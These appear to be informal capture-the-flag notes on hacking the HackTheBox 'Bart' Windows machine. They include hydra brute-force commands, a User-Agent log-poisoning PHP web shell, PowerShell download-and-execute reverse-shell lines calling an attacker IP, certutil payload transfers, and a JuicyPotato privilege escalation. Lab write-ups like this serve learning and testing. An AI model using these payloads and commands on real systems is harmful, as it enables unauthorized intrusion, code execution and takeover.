Bart (Windows) - juicy potato priv esc, more hydra practice

​
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
​
gobuster won't work since 200 code messes up.
 
this is messing it up.
had to use python3 dirsearch.py -u http://bart.htb -e php,aspx,asp,txt -x 500,404,403 instead 
I had internet issue yesterday and couldn't get the /monitor/ link forever. I guess it's sometimes good to take a break. 
login form found. 
Observing traffic on burp 
tried to log in as harvey with the password, potter (had to look up this one) 
since csrf is set in the request, hydra didn't work well. 
Added monitor.bart.htb to the etc/hosts file.
added internal-01.bart.htb to the hosts file as well.
Another login form found. 
this time,no csrf! 
"csrf=e1e86e54783cc512631bb30c318ddd749e99ad3f79254fa9da7891c957dd58bf&user_name=^USER^&user_password=^PASS^&action=login:incorrect"
uname=harvey+&passwd=potter&submit=Login
 Invalid
hydra -l harvey -P ~/rockyou.txt internal-01.bart.htb http-post-form "/simple_chat/login_form.php:uname=^USER^&passwd=^PASS^&submit=Login:Invalid" -t 54
This didn't work...
hydra -l harvey -P ~/rockyou.txt 127.0.0.1 http-post-form "/simple_chat/login_form.php:C=uname=^USER^&passwd=^PASS^&submit=Login:F=Password" 
 set up the burp to redirect the traffic: 
 
tried it didn't work.
Another route: 
cp /usr/share/metasploit-framework/data/wordlists/common_roots.txt .
it accepts password longer than 8 letters so, 
​
cat common_roots.txt| awk '{if (length($0) > 7) print}' > passv2.txt 
​
hydra -l harvey -P passv2.txt 127.0.0.1 http-post-form "/simple_chat/login_form.php:uname=^USER^&passwd=^PASS^&submit=Login:Password"
 omg I was typing the URL wrong the entire time!!
​
It looks like it's logging everytime someone visits the log.php
if we change the useragent to malicious code, we can execute?
<?php system($ REQUEST['cmd']); ?>
successfully executed 
By changing te useragent to the code, it planted a code execution path with the file name (the file name can be anything) 
changed useragent to the php code
changed file name to cmd.php in GET 
​
now we can go to http://internal-01.bart.htb/log/cmd.php?cmd=whoami to execute it 
now we can do reverse shell! 
​
Let's use powershell 
grab a ps1 from nishang and host it on python http server. 
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.16.14:80/shell.ps1') 
Now we have our user shell. 
executing  whoami /priv shows that impersonateprivilege is enabled>
juicy potato! 
​
​
https://ohpe.it/juicy-potato/https://github.com/ohpe/juicy-potato/releases/tag/v0.1
ohpe.it
transfer over the file:
certutil -urlcache -split -f http://10.10.16.14:80/JuicyPotato.exe C:\Users\Public\JuicyPotato.exe
now I copied the ps1 shell file and adjusted the port to 4444 and started another net cat listner
Now, I created a bat file that contains the following code:
powershell "IEX (New-Object Net.Webclient).downloadstring('http://10.10.16.14:80/shell.ps1')"
Then, I transferred the file over to the target machine and named it reverse.bat
certutil -urlcache -split -f http://10.10.16.14:80/shellsama.bat C:\Users\Public\reverse.bat
Finally, I ran the following command (the -l 1111 is not doing anything here) 
.\JuicyPotato.exe -t * -p .\reverse.bat -l 1111 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"	 
for CSLID value, I just used one of the may here https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/ 
  
Some trouble shooting sites I used: https://nicepage.com/Editor/Siteboard/#/builder/470270/page/470271 
HackTheBox - Bart
0x4rt3mis
HTB Write-up Nineveh
HTB Write-up Kotarak
Last modified 1yr ago